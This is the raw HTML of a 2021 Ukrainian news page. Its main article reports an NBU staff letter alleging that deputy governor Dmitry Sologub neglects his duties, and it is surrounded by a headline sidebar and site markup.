href="https://enovosty.com/news_abroad/full/402-mirovye-rasxody-na-oboronu-v-proshlom-godu-vyrosli-do-19-trln">Мировые расходы на оборону в прошлом году выросли до $1,9 трлн</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834872"> <span class="postDate">14:17</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-u-nas-net-ni-vakciny-ni-plana-vakcinacii-sovsun-video">У нас нет ни вакцины, ни плана вакцинации, - Совсун (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834863"> <span class="postDate">14:08</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/402-esli-est-podozrenie-v-terrorizme-dolzhno-byt-ugolovnoe-delo-raxmanin-o-dele-kozaka-video">Если есть подозрение в терроризме, должно быть уголовное дело, - Рахманин о деле Козака (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834865"> <span class="postDate">14:04</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-geopoliticheskij-stalker-putina-eks-bojrend-ameriki-iz-ada-the-new-york-times">Геополитический сталкер: Путин - экс-бойфренд Америки из ада, - The New York Times</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834814"> <span class="postDate">14:00</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/402-voditelyam-v-ukraine-dali-pravo-ignorirovat-signal-ob-ostanovke-policiej">Водителям в Украине дали право игнорировать сигнал об остановке полицией</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834871"> <span class="postDate">13:52</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/402-kogo-v-ukraine-oboshlo-storonoj-poslednee-povyshenie-pensij">Кого в Украине обошло стороной последнее повышение пенсий</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834812"> <span class="postDate">13:40</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-bunt-kastryul-v-myanme-zhiteli-vyshli-na-akciyu-protesta-protiv-voennogo-perevorota">"Бунт кастрюль" в Мьянме: жители вышли на акцию протеста против военного переворота</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834810"> <span class="postDate">13:20</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/402-uchenye-obnaruzhili-eshhe-odin-vitamin-sposobnyj-oblegchit-techenie-covid-19">Ученые обнаружили еще один витамин, способный облегчить течение COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834845"> <span class="postDate">13:15</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-v-kongress-ssha-vnesli-proekt-sankcij-protiv-rossijskix-chinovnikov-iz-za-navalnogo">В Конгресс США внесли проект санкций против российских чиновников из-за Навального</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834790"> <span class="postDate">13:08</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/402-izrailskaya-kompaniya-na-oboronnoj-vystavke-predstavila-bombu-spice-250-s-turboreaktivnym-dvigatelem">Израильская компания на оборонной выставке представила бомбу SPICE 250 с турбореактивным двигателем</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834861"> <span class="postDate">12:49</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-medicina-byla-eyo-prizvaniem-v-smi-pokazali-foto-26-letnej-devushki-pogibshej-v-pozhare-v-zaporozhe">"Медицина была её призванием": В СМИ показали фото 26-летней девушки, погибшей в пожаре в Запорожье</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834862"> <span class="postDate">12:40</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/402-v-verxovnoj-rade-skoro-budet-predstavlen-novyj-zakon-o-media-kravchuk-video">В Верховной Раде скоро будет представлен новый закон о медиа, - Кравчук (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834834"> <span class="postDate">12:31</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-kanada-priznala-russkoe-imperskoe-dvizhenie-terroristicheskoj-organizaciej">Канада признала Русское имперское движение террористической организацией</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834802"> <span class="postDate">12:30</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/402-v-ukrainu-idet-moshhnyj-ciklon-kotoryj-prineset-uxudshenie-pogody-sinoptik">В Украину идет мощный циклон, который принесет ухудшение погоды, - синоптик</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834860"> <span class="postDate">12:26</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/402-uchenyj-rasskazal-pochemu-agrarii-v-ukraine-boyatsya-kartofelya">Ученый рассказал, почему аграрии в Украине боятся картофеля</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834858"> <span class="postDate">12:17</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-bolee-60-ukraincev-podderzhivayut-ideyu-rospuska-verxovnoj-rady-socopros">Более 60% украинцев поддерживают идею роспуска Верховной Рады - соцопрос</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834857"> <span class="postDate">12:15</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-na-italyanskom-ostrove-zapretili-zarazhatsya-i-bolet-koronavirusom">На итальянском острове запретили заражаться и болеть коронавирусом</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834852"> <span class="postDate">12:03</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-komitet-rady-podderzhal-ukraine-vernut-nyu-jork">Комитет Рады поддержал: Украине вернут Нью-Йорк</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834808"> <span class="postDate">12:01</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/402-nakazali-po-narodnomu-v-kieve-sverxzhestko-prouchili-geroya-parkovki-foto">Наказали по-народному: в Киеве проучили "героя парковки" (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834849"> <span class="postDate">12:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-shmygal-nazval-datu-do-kotoroj-budet-prodlen-karantin">Шмыгаль назвал дату, до которой будет продлен карантин</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834827"> <span class="postDate">11:57</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-v-rf-pered-specpriemnikom-voznikli-ocheredi-iz-avtozakov-s-arestovannymi-posle-akcij-protesta-video">"Полный коллапс": под Москвой возникли очереди из автозаков с арестованными после акций протеста (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834848"> <span class="postDate">11:54</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/402-my-edinstvennaya-strana-v-evrope-gde-net-gosudarstvennogo-reestra-oruzhiya-raxmanin-video">Мы единственная страна в Европе, где нет государственного реестра оружия, - Рахманин (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834801"> <span class="postDate">11:45</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/402-v-nbu-priznali-vsplesk-inflyacii-chto-podorozhaet-v-2021-m">В НБУ признали "всплеск инфляции": Что подорожает в 2021-м?</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834815"> <span class="postDate">11:14</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-v-rossii-predlozhili-kompaniyam-rabotat-v-krymu-anonimno-chtoby-ne-popast-pod-sankcii">В России предложили компаниям работать в Крыму анонимно, чтобы не попасть под санкции</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834798"> <span class="postDate">10:34</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/402-portnikov-nazval-tri-prichiny-pochemu-zelenskij-poshel-na-pryamoj-konflikt-s-medvedchukom">Портников назвал три причины, почему Зеленский пошел на прямой конфликт с Медведчуком</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834797"> <span class="postDate">10:33</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/402-glava-pravleniya-cherkassyoblenergo-oleg-samchuk-vystupil-za-prekrashhenie-bankrotstva-predpriyatiya">Глава правления "Черкассыоблэнерго" Олег Самчук выступил за прекращение банкротства предприятия</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834789"> <span class="postDate">09:50</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/402-senatory-ssha-prigotovili-sankcionnyj-udar-iz-za-otravleniya-navalnogo">Сенаторы США приготовили санкционный удар из-за отравления Навального</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834788"> <span class="postDate">09:43</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/402-ekspert-ozvuchil-interesnyj-prognoz-po-sudbe-gazoprovod-severnogo-potoka-2">Эксперт озвучил интересный прогноз по судьбе газопровода "Северный поток-2"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834787"> <span class="postDate">09:36</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/402-v-zaporozhe-v-koronavirusnoj-bolnice-proizoshel-moshhnyj-pozhar-vse-podrobnosti-video">В Запорожье в "коронавирусной" больнице произошел мощный пожар. Все подробности (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834786"> <span class="postDate">09:14</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/402-pensii-v-ukraine-dolzhny-byt-v-dva-raza-vyshe-nazvana-realnaya-cifra">Пенсии в Украине должны быть в два раза выше. Названа реальная цифра</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4834785"> <span class="postDate">09:11</span> <a class="postTitle" href="https://enovosty.com/news_society/full/402-v-ukraine-oslabyat-karantin-kakie-ogranicheniya-budut-dejstvovat">В Украине ослабят карантин. Какие ограничения будут действовать</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post" style="margin:0; padding:0; " id="post-4834948"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_economy/full/402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Замглавы НБУ Дмитрий Сологуб, получая по 300 тыс. грн, прогуливает работу, а в офисе играет в теннис &#8212; сотрудники НБУ</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_economy">Новости экономики</a> <span>&raquo;</span> Замглавы НБУ Дмитрий Сологуб, получая по 300 тыс. грн, прогуливает работу, а в офисе играет в теннис - сотрудники НБУ</div><time datetime="2021-02-04T21:49:59+02:00"><span id="date">Новости экономики, 21:49:59 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%97%D0%B0%D0%BC%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B+%D0%9D%D0%91%D0%A3+%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%B8%D0%B9+%D0%A1%D0%BE%D0%BB%D0%BE%D0%B3%D1%83%D0%B1%2C+%D0%BF%D0%BE%D0%BB%D1%83%D1%87%D0%B0%D1%8F+%D0%BF%D0%BE+300+%D1%82%D1%8B%D1%81.+%D0%B3%D1%80%D0%BD%2C+%D0%BF%D1%80%D0%BE%D0%B3%D1%83%D0%BB%D0%B8%D0%B2%D0%B0%D0%B5%D1%82+%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%83%2C+%D0%B0+%D0%B2+%D0%BE%D1%84%D0%B8%D1%81%D0%B5+%D0%B8%D0%B3%D1%80%D0%B0%D0%B5%D1%82+%D0%B2+%D1%82%D0%B5%D0%BD%D0%BD%D0%B8%D1%81+-+%D1%81%D0%BE%D1%82%D1%80%D1%83%D0%B4%D0%BD%D0%B8%D0%BA%D0%B8+%D0%9D%D0%91%D0%A3&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%97%D0%B0%D0%BC%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B+%D0%9D%D0%91%D0%A3+%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%B8%D0%B9+%D0%A1%D0%BE%D0%BB%D0%BE%D0%B3%D1%83%D0%B1%2C+%D0%BF%D0%BE%D0%BB%D1%83%D1%87%D0%B0%D1%8F+%D0%BF%D0%BE+300+%D1%82%D1%8B%D1%81.+%D0%B3%D1%80%D0%BD%2C+%D0%BF%D1%80%D0%BE%D0%B3%D1%83%D0%BB%D0%B8%D0%B2%D0%B0%D0%B5%D1%82+%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%83%2C+%D0%B0+%D0%B2+%D0%BE%D1%84%D0%B8%D1%81%D0%B5+%D0%B8%D0%B3%D1%80%D0%B0%D0%B5%D1%82+%D0%B2+%D1%82%D0%B5%D0%BD%D0%BD%D0%B8%D1%81+-+%D1%81%D0%BE%D1%82%D1%80%D1%83%D0%B4%D0%BD%D0%B8%D0%BA%D0%B8+%D0%9D%D0%91%D0%A3&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4834948" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><p><b>Заместитель главы правления Национального банка Украины Дмитрий Сологуб игнорирует правила работы в организации, не появляясь на рабочем месте и не выполняя своих обязанностей. Об этом идет речь в письме сотрудников НБУ, текстом которого обладает редакция «Экономических новостей».</b></p><p>«Дмитрий Сологуб отвечает в банке а направление «Монетарная стабильность». Он получает высокую зарплату – согласно декларации, более 300 тыс. грн. ежемесячно. Однако своими обязанностями он не особенно озадачен», &#8212; говорится в письме.</p><p>Сотрудники <a class="tag" href="https://enovosty.com/tag/nacbank" target="_blank">Нацбанк</a>а заметили, что Сологуб редко бывает на работе, причем, в январе вовсе игнорировал принятую в <a class="tag" href="https://enovosty.com/tag/nbu" target="_blank">НБУ</a> форму для организации удаленной работы. То есть, формально он вообще не работал. Кроме того, когда Дмитрий Сологуб все же приезжает на работу, то не к 9.00, как остальные сотрудники, а к обеду. А приехав, идет играть в настольный теннис, утверждают сотрудники НБУ.</p><p><div data-hyb-ssp-in-image-overlay="5ef49f174d506eacc0504d73" style="text-align:center;"><img class="aligncenter size-full wp-image-4834950" src="https://enovosty.com/wp-content/uploads/2021/02/3-.jpeg" title="Замглавы НБУ Дмитрий Сологуб, получая по 300 тыс. грн, прогуливает работу, а в офисе играет в теннис &#8212; сотрудники НБУ" alt="Замглавы НБУ Дмитрий Сологуб, получая по 300 тыс. грн, прогуливает работу, а в офисе играет в теннис &#8212; сотрудники НБУ" width="490" height="367" srcset="https://enovosty.com/wp-content/uploads/2021/02/3-.jpeg 490w, https://enovosty.com/wp-content/uploads/2021/02/3--112x84.jpeg 112w, https://enovosty.com/wp-content/uploads/2021/02/3--300x225.jpeg 300w, https://enovosty.com/wp-content/uploads/2021/02/3--52x38.jpeg 52w, https://enovosty.com/wp-content/uploads/2021/02/3--100x75.jpeg 100w, https://enovosty.com/wp-content/uploads/2021/02/3--460x345.jpeg 460w" sizes="(max-width: 490px) 100vw, 490px" /></div></p><p>«Целесообразно процитировать Кодекс этики работника Национального банка Украины: «Работники НБУ должны осознавать, что государство и общество высказали им наивысшую степень доверия, быть ответственными а свои действия и их результаты, независимо от уровня должности. Руководители НБУ должны быть примером этичного и профессионального поведения», &#8212; отмечается в письме сотрудников НБУ. Там подчеркивается, что НБУ и Совет НБУ должны решить, насколько Дмитрий Сологуб соответствует критериям, что установлены для руководителей Нацбанка.</p><p><div data-hyb-ssp-in-image-overlay="5ef49f174d506eacc0504d73" style="text-align:center;"><img class="aligncenter size-full wp-image-4834952" src="https://enovosty.com/wp-content/uploads/2021/02/capture1.jpg" title="Замглавы НБУ Дмитрий Сологуб, получая по 300 тыс. грн, прогуливает работу, а в офисе играет в теннис &#8212; сотрудники НБУ" alt="Замглавы НБУ Дмитрий Сологуб, получая по 300 тыс. грн, прогуливает работу, а в офисе играет в теннис &#8212; сотрудники НБУ" width="490" height="582" srcset="https://enovosty.com/wp-content/uploads/2021/02/capture1.jpg 490w, https://enovosty.com/wp-content/uploads/2021/02/capture1-94x112.jpg 94w, https://enovosty.com/wp-content/uploads/2021/02/capture1-253x300.jpg 253w, https://enovosty.com/wp-content/uploads/2021/02/capture1-460x546.jpg 460w" sizes="(max-width: 490px) 100vw, 490px" /></div><br /><img src="https://enovosty.com/wp-content/uploads/2021/02/capture2.jpg" title="Замглавы НБУ Дмитрий Сологуб, получая по 300 тыс. грн, прогуливает работу, а в офисе играет в теннис &#8212; сотрудники НБУ" alt="Замглавы НБУ Дмитрий Сологуб, получая по 300 тыс. грн, прогуливает работу, а в офисе играет в теннис &#8212; сотрудники НБУ" width="490" height="380" class="aligncenter size-full wp-image-4834953" srcset="https://enovosty.com/wp-content/uploads/2021/02/capture2.jpg 490w, https://enovosty.com/wp-content/uploads/2021/02/capture2-112x87.jpg 112w, https://enovosty.com/wp-content/uploads/2021/02/capture2-300x233.jpg 300w, https://enovosty.com/wp-content/uploads/2021/02/capture2-460x357.jpg 460w" sizes="(max-width: 490px) 100vw, 490px" /></p><p>Как ранее сообщалось, <a rel="nofollow" href="https://www.pravda.com.ua/rus/news/2021/01/22/7280783/" data-saferedirecturl="https://www.google.com/url?q=https://www.pravda.com.ua/rus/news/2021/01/22/7280783/&amp;source=gmail&amp;ust=1612553999410000&amp;usg=AFQjCNFcH4NewRJNPgzdr1AI06g1E08tOw">народных депутатов лишили возмещения</a> расходов на осуществление депутатских полномочий за декабрь, потому что они пропустили более 30% голосований в Раде. Подобная практика штрафов и снижения начислений может быть применена и к сотрудникам других ведомств, в том числе, НБУ.</p><div class="tptn_counter" style="color:white;" id="tptn_counter_4834948"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4834948&amp;_wpnonce=051d6527d0"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/> <meta itemprop="width" content="512"> <meta itemprop="height" content="512"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Оксана Ельченко" /></span><meta itemprop="datePublished" content="2021-02-04T21:49:59+02:00"/><meta itemprop="dateModified" content="2021-02-04T22:21:25+02:00"/><meta itemprop="genre" content="Новости экономики"/><meta itemprop="description" content="Заместитель главы правления Национального банка Украины Дмитрий Сологуб игнорирует правила работы в организации, не появляясь на рабочем месте и не выполняя своих обязанностей. Об этом идет речь в письме сотрудников НБУ, текстом которого обладает редакция «Экономических новостей»."/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"><span itemprop="image" content="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"><meta itemprop="width" content="512" /><meta itemprop="height" content="512" /> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg"></a><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Оксана Ельченко</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/nacbank" rel="tag">Нацбанк</a>, <a href="https://enovosty.com/tag/nbu" rel="tag">НБУ</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 556</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%97%D0%B0%D0%BC%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B+%D0%9D%D0%91%D0%A3+%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%B8%D0%B9+%D0%A1%D0%BE%D0%BB%D0%BE%D0%B3%D1%83%D0%B1%2C+%D0%BF%D0%BE%D0%BB%D1%83%D1%87%D0%B0%D1%8F+%D0%BF%D0%BE+300+%D1%82%D1%8B%D1%81.+%D0%B3%D1%80%D0%BD%2C+%D0%BF%D1%80%D0%BE%D0%B3%D1%83%D0%BB%D0%B8%D0%B2%D0%B0%D0%B5%D1%82+%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%83%2C+%D0%B0+%D0%B2+%D0%BE%D1%84%D0%B8%D1%81%D0%B5+%D0%B8%D0%B3%D1%80%D0%B0%D0%B5%D1%82+%D0%B2+%D1%82%D0%B5%D0%BD%D0%BD%D0%B8%D1%81+-+%D1%81%D0%BE%D1%82%D1%80%D1%83%D0%B4%D0%BD%D0%B8%D0%BA%D0%B8+%D0%9D%D0%91%D0%A3&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%97%D0%B0%D0%BC%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B+%D0%9D%D0%91%D0%A3+%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%B8%D0%B9+%D0%A1%D0%BE%D0%BB%D0%BE%D0%B3%D1%83%D0%B1%2C+%D0%BF%D0%BE%D0%BB%D1%83%D1%87%D0%B0%D1%8F+%D0%BF%D0%BE+300+%D1%82%D1%8B%D1%81.+%D0%B3%D1%80%D0%BD%2C+%D0%BF%D1%80%D0%BE%D0%B3%D1%83%D0%BB%D0%B8%D0%B2%D0%B0%D0%B5%D1%82+%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%83%2C+%D0%B0+%D0%B2+%D0%BE%D1%84%D0%B8%D1%81%D0%B5+%D0%B8%D0%B3%D1%80%D0%B0%D0%B5%D1%82+%D0%B2+%D1%82%D0%B5%D0%BD%D0%BD%D0%B8%D1%81+-+%D1%81%D0%BE%D1%82%D1%80%D1%83%D0%B4%D0%BD%D0%B8%D0%BA%D0%B8+%D0%9D%D0%91%D0%A3&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4834948" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" 